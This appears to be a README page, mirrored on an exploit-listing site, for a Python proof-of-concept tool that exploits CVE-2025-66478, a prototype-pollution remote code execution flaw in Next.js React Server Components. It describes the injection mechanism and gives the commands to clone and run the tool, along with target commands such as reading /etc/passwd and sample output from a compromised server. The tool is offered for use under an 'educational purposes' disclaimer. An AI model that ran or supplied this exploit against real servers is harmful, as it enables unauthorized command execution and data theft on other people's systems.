Share
## https://sploitus.com/exploit?id=9D33E265-E850-555F-B8FE-CB2BB529DC8F
# โšก React2Shell Exploit PoC (CVE-2025-66478)

> **Next.js Remote Code Execution (RCE) via Prototype Pollution in Server Components**


  
  
  


---

## ๐Ÿ•ต๏ธโ€โ™‚๏ธ Overview

This repository contains a **Proof of Concept (PoC)** for **CVE-2025-66478** (also referenced as **CVE-2025-55182** in some contexts), a critical vulnerability affecting **Next.js** applications that use specific versions of **React Server Components (RSC)**.

By manipulating the serialization process of RSCs, an unauthenticated attacker can inject a malicious payload via **prototype pollution** (`__proto__:then`). This can lead to execution of arbitrary system commands on the server through `child_process.execSync`.

**Developed by:** ArkhamKnight47

---

## ๐Ÿš€ Features

- **Interactive CLI** โ€” Simple prompts for target URL and command.
- **Payload Injection** โ€” Automatically builds the required `multipart/form-data` payload.
- **Smart Output Cleaning** โ€” Parses raw JSON responses and displays *only* clean command output (e.g., strips `1:E{"digest":...}`).
- **Matrix Theme** โ€” Green-on-black aesthetic with ASCII art banner.
- **Cross-Platform** โ€” Handles newline differences (`\n` vs `\r\n`) for clean output on Windows and Linux targets.

---

## ๐Ÿ› ๏ธ Installation & Usage

### Prerequisites

- Python **3.x**
- `requests` library

### Setup

```bash
# Clone the repository
git clone https://github.com/ArkhamKnight47/React2Shell-PoC.git
cd React2Shell-PoC

# Install dependencies
pip install requests
```

### Running the Exploit

```bash
python CVE-2025-66478.py
```

You will be prompted for:

- **Target URL** โ€” e.g. `http://localhost:3000`
- **Command** โ€” e.g. `id`, `whoami`, `cat /etc/passwd`

---

## ๐Ÿ“Œ Example Output

```text
[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND    > cat /etc/passwd

[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
```

---

## โš ๏ธ Disclaimer

This tool is provided **for educational and security research purposes only**.

The author (**ArkhamKnight47**) takes **no responsibility** for misuse of this code. Testing this exploit against systems you do not own or do not have explicit permission to test is **illegal and unethical**.

- โŒ Do **not** use against production systems without authorization
- โœ… Do use to validate vulnerabilities in **your own applications**
- โœ… Do use to learn about **RSC serialization and prototype pollution risks**

---

> Use responsibly. Learn ethically. Secure your stack.